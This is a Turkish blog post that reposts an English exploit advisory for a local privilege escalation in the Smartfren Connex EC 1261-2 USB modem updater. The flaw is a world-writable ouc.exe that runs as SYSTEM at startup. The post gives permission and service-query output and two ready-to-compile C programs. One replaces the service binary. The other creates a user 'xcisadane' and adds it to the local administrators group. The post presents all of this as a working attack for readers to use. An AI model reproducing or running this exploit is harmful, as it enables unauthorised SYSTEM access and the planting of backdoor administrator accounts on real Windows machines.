admin | 27 Eylül 2012
No comments

Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability

Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation açığı ve local exploit. Microsoft Windows 7 Ultimate 64 Bit te test edilmiş olup, açığa ilişkin anlıtımları aşağıdaki gibidir.

==========================================================================
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
==========================================================================
 
:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
: # Date : 26 September 2012
: # Author : X-Cisadane
: # Software Link : http://www.smartfren.com/data/ec1261.html 
: # File Version : 21.005.15.03.836 
: # Category : Desktop (Windows) Applications
: # Platform : Win32 & Win64
: # Vulnerability : Local Privilege Escalation Vulnerability
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary
========
Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files.
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.
 
Description
===========
Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice.
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges.
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).
 
Proof of Concept
================
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe   Everyone:F
                                    BUILTIN\Users:F
                                                                        NT AUTHORITY\SYSTEM:(ID)F
                                                                        BUILTIN\Administrators:(ID)F
 
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Smartfren Connex EC1261-2 UI. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 
----------------------------------------------------------------------------------------------
The following attack scenario could be used :
1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file.
For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
Rename the file to ouc.exe.old
2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
3. Restart the system.
After restart attackers malicious file will be executed with SYSTEM privileges.
 
You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:\sploit.cpp
 
#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{
 
     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
     return 0;
}
  
 
Compile these script below with Dev-C++
Save in the C:\bin.cpp
 
#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
     return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:\
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.

Bir önceki yazımız olan Cisco DPC2100 Denial of Service başlıklı makalemizde Cisco Denial of Service, Denial of Service ve Denial of Service Atak hakkında bilgiler verilmektedir.

Category: Genel | Tags: ,

Bir Cevap Yazın